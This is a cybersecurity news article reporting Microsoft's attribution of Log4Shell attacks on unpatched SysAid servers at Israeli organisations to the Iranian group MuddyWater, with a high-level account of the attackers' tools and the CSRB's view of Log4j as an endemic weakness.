Iranian state-sponsored actors are leaving no stone unturned to
exploit unpatched systems running Log4j to target Israeli entities,
indicating the vulnerability’s long tail[1]
for remediation.
Microsoft attributed the latest set of activities to the
umbrella threat group[2]
tracked as MuddyWater[3]
(aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is
linked[4]
to the Iranian intelligence apparatus, the Ministry of Intelligence
and Security (MOIS).
The attacks are notable for using SysAid Server instances
unsecured against the Log4Shell flaw[5]
as a vector for initial access, marking[6]
a departure[7]
from the actors’ pattern of leveraging VMware applications for
breaching target environments.
“After gaining access, Mercury establishes persistence, dumps
credentials, and moves laterally within the targeted organization
using both custom and well-known hacking tools, as well as built-in
operating system tools for its hands-on-keyboard attack,” Microsoft
said[8].
The tech giant’s threat intelligence team said it observed the
attacks between July 23 and 25, 2022.
A successful compromise is said to have been followed by the
deployment of web shells to execute commands that permit the actor
to conduct reconnaissance, establish persistence, steal
credentials, and facilitate lateral movement.
Also employed for command-and-control (C2) communication during
intrusions is a remote monitoring and management software called
eHorus[9] and Ligolo, a reverse-tunneling tool[10] of choice for the
adversary.
The findings come as the U.S. Department of Homeland Security’s
Cyber Safety Review Board (CSRB) deemed[11] the critical
vulnerability in the open-source Java-based logging framework an
endemic weakness that will continue to plague organizations for
years to come as exploitation evolves.
Log4j’s wide usage[12] across many suppliers’
software and services means sophisticated adversaries like
nation-state actors and commodity operators alike have
opportunistically taken advantage of the vulnerability to mount a
smorgasbord of attacks.
The Log4Shell attacks also follow a recent report from Mandiant
that detailed an espionage campaign aimed at Israeli shipping,
government, energy, and healthcare organizations by a likely
Iranian hacking group dubbed UNC3890[13].
References
- ^
long
tail (thehackernews.com) - ^
umbrella
threat group (thehackernews.com) - ^
MuddyWater
(thehackernews.com) - ^
linked
(thehackernews.com) - ^
Log4Shell flaw
(thehackernews.com) - ^
marking
(thehackernews.com) - ^
departure
(thehackernews.com) - ^
said
(www.microsoft.com) - ^
eHorus
(ehorus.com) - ^
reverse-tunneling tool
(thehackernews.com) - ^
deemed
(www.dhs.gov) - ^
wide
usage (www.microsoft.com) - ^
UNC3890
(thehackernews.com)
Read more https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html
